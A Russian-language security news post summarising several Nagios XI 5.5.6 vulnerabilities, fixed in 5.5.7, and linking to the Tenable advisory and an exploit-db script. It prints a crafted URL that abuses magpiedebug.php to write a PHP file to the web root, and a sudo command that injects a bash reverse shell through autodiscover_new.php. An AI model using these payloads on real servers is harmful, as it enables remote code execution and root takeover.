nagios #exploit #обновления

Целая лаба для школьников

В Nagios XI 5.5.6 выявлена сразу пачка простых и эффективных уязвимостей, среди которых удаленное выполнение произвольного кода с правами юзера apache и повышение привилегий, что в комбинации позволяет получить полный доступ к серверу. Доступна версия Nagios XI 5.5.7, в которой данные дыры устранены.

CVE-2018-15708 - RCE с правами apache. Проблема в Snoopy.class.inc, содержащем такой код:

exec($this->curlpath." -D \"/tmp/$headerfile\"".escapeshellcmd($cmdlineparams)." ".escapeshellcmd($URI),$results,$return);

где $URI может быть передан через URI запроса к magpiedebug.php, что позволяет модифицировать команду. Например, следующий запрос приведет к сохранению произвольного файла в /usr/local/nagvis/share, откуда он может быть запущен через веб-интерфейс:

https://x.x.x.x/nagiosxi/includes/dashlets/rssdashlet/magpierss/scripts/magpiedebug.php?url=https:///%20-o%20/usr/local/nagvis/share/exec.php

CVE-2018-15710 - повышение привилегий через параметр addresses в функции autodiscovernew.php. По умолчанию в /etc/sudoers прописываются разрешения запуска данного скрипта с правами рута и без пароля для юзеров apache и nagios. Пример запуска обратного шелла с повышением:

sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/0;/bin/bash -i >& /dev/tcp//4444 0>&1;'

И еще:

CVE-2018-15709 - внедрение команд ОС через веб-интерфейс авторизованным пользователем.

CVE-2018-15711 - повышение привилегий авторизованным пользователем Nagios через переустановку ключей администраторов.

CVE-2018-15712 - хранимая XSS от лица неавторизованного пользователя.

CVE-2018-15713 - хранимая XSS от авторизованного пользователя.

CVE-2018-15714 - отраженная XSS

Описание уязвимостей, пути, параметры, форматы можно посмотреть тут: https://www.tenable.com/security/research/tra-2018-37
Вариант совмещения и автоматизации для первых двух дыр: https://www.exploit-db.com/exploits/46221